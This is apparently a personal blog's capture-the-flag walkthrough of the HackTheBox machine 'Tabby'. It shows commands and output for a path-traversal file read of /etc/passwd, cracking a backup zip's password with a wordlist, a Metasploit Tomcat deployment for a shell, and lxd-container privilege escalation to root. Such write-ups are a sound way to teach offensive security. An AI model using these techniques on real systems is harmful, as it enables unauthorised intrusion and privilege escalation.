This page looks best with JavaScript enabled

HackTheBox: Tabby

 ·  ☕ 2 min read

Enumeration:

Started by enumerating ports with nmap:

root@docker-desktop:~# ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.194 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
root@docker-desktop:~# nmap -sC -sV -p$ports 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-22 09:16 CEST
Nmap scan report for 10.10.10.194
Host is up (0.018s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds

Manually enumarated the web on port 80 found an url that is vulnerable to local file inclusion:

root@docker-desktop:~# curl http://10.10.10.194/news.php?file=../../../../../etc/passwd | head -n 1
root: x:0:0:root:/root:/bin/bash

Tried some techniques to get RCE from LFI without success.

Afterwards enumerated the port 8080 and found some interesting stuff:

Burpsuite credentials

Intrussion:

With all that data then searched for /etc/tomcat9/tomcat-users.xml:

Burpsuite credentials

Used metasploit tomcat_mgr_deploy to get the shell:

Burpsuite credentials

Privesc:

Then found in /var/www/html a backup:

ash@tabby:/var/www/html/files$ ls
16162020_backup.zip  archive  revoked_certs  statement

Downloaded the file and apparently is protected with a password so cracked it:

root@docker-desktop:~/Downloads# fcrackzip -u -D -p /root/shared/wordlists/rockyou.txt 16162020_backup.zip

PASSWORD FOUND!!!!: pw == admin@it

Then logged in as ash using ssh and that password:

ash@tabby:/var/lib/tomcat9$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

As we saw with id we can do privesc with lxc:

ash@tabby:/var/lib/tomcat9$ lxc image list
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE  |         UPLOAD DATE          |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| som   | aa3de00946cd | no     | alpine v3.12 (20200622_22:22) | x86_64       | CONTAINER | 2.97MB | Jun 22, 2020 at 6:48pm (UTC) |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+

ash@tabby:/var/www/html/files$ lxc init som ignite -c security.privileged=true
ash@tabby:/var/www/html/files$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
ash@tabby:/var/www/html/files$ lxc start ignite
ash@tabby:/var/www/html/files$ lxc exec ignite /bin/sh

cd /mnt/root/root
ls
flag.txt

Resources

Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover